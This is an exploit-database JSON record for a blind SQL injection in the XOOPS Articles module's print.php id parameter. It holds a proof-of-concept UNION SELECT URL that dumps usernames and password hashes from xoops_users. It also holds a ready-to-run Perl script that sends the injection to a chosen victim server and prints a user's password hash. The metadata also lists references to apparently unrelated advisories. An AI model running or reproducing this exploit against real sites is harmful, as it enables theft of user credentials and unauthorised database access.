{"published": "2007-03-27T00:00:00", "id": "1337DAY-ID-1657", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2018-02-16T01:14:33", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852087", "OPENVAS:1361412562310875589", "OPENVAS:1361412562311220191532"]}, {"type": "nessus", "idList": ["FEDORA_2018-527698A904.NASL", "OPENSUSE-2018-1364.NASL", "SUSE_SU-2019-1671-1.NASL", "PHOTONOS_PHSA-2019-1_0-0237_PYTHON2.NASL", "FEDORA_2018-DB0D3E157E.NASL", "EULEROS_SA-2019-1492.NASL", "OPENSUSE-2019-398.NASL", "FEDORA_2018-44F8A7454D.NASL", "REDHAT-RHSA-2018-3402.NASL", "EULEROS_SA-2019-1532.NASL"]}, {"type": "redhat", "idList": ["RHSA-2018:3401", "RHSA-2018:3396"]}], "modified": "2018-02-16T01:14:33", "rev": 2}, "vulnersScore": 0.8}, "type": "zdt", "lastseen": "2018-02-16T01:14:33", "edition": 2, "title": "XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit", "href": "https://0day.today/exploit/description/1657", "modified": "2007-03-27T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/1657", "references": [], "reporter": "WiLdBoY", "sourceData": "==================================================================\r\nXOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit\r\n==================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl -w\r\n\r\n# Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC\r\n\r\n# Type :\r\n\r\n# SQL Injection\r\n\r\n# Release Date :\r\n\r\n# {2007-03-26}\r\n\r\n# Product / Vendor :\r\n\r\n# http://support.sirium.net/\r\n\r\n# Bug :\r\n\r\n# http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0\r\n\r\n# PoC :\r\n\r\n# http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*\r\n\r\n# Exploit :\r\n\r\n#############################################\r\n#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#\r\n#############################################\r\n\r\nuse IO::Socket;\r\n\r\nif (@ARGV != 3)\r\n{\r\n print \"\\n-----------------------------------\\n\";\r\n print \"Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\\n\";\r\n print \"-----------------------------------\\n\";\r\n print \"\\nUniquE-Key{UniquE-Cracker}\\n\";\r\n print \"UniquE[at]UniquE-Key.ORG\\n\";\r\n print \"http://UniquE-Key.ORG\\n\";\r\n print \"\\n-----------------------------------\\n\";\r\n print \"\\nUsage: $0 <server> <path> <uid>\\n\";\r\n print \"Examp: $0 www.victim.com /path 1\\n\";\r\n print \"\\n-----------------------------------\\n\";\r\n exit ();\r\n}\r\n\r\n$server = $ARGV[0];\r\n$path = $ARGV[1];\r\n$uid = $ARGV[2];\r\n\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\");\r\nprintf $socket (\"GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\\nHost: %s\\nAccept: */*\\nConnection: close\\n\\n\",\r\n$path,$server,$uid);\r\n\r\nwhile(<$socket>)\r\n\r\n{\r\n if (/\\>(\\w{32})\\</) { print \"\\nID '$uid' User Password :\\n\\n$1\\n\"; }\r\n}\r\n\r\n# Tested :\r\n\r\n# All Version\r\n\r\n# Author :\r\n\r\n# UniquE-Key{UniquE-Cracker}\r\n\r\n\r\n\n# 0day.today [2018-02-15] #"}

{}